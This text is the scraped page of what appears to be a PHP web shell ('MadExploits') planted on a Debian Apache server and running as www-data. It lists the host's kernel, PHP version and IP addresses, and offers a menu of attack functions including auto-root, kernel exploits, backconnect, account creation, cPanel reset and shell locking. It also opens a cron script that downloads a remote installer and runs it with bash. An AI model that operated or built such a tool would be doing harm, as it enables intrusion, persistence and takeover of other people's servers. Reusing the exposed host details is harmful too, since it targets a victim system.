Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 18.117.148.44
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
cron.hourly /
[ HOME SHELL ]
Name
Size
Permission
Action
.placeholder
102
B
-rw-r--r--
droplet-agent-install
389
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : droplet-agent-install
#!/bin/sh tmp_file=$(mktemp -t droplet_agent.install.XXXXXX) trap "rm -f ${tmp_file}" EXIT url="https://repos-droplet.digitalocean.com/install.sh" install_script=$(curl -sSL "${url}" || wget -qO- "${url}") echo "${install_script}" > ${tmp_file} now=$(date +"%T") echo "Retry at: ${now}" > /var/log/droplet_agent.install.log /bin/bash ${tmp_file} >> /var/log/droplet_agent.install.log 2>&1
Close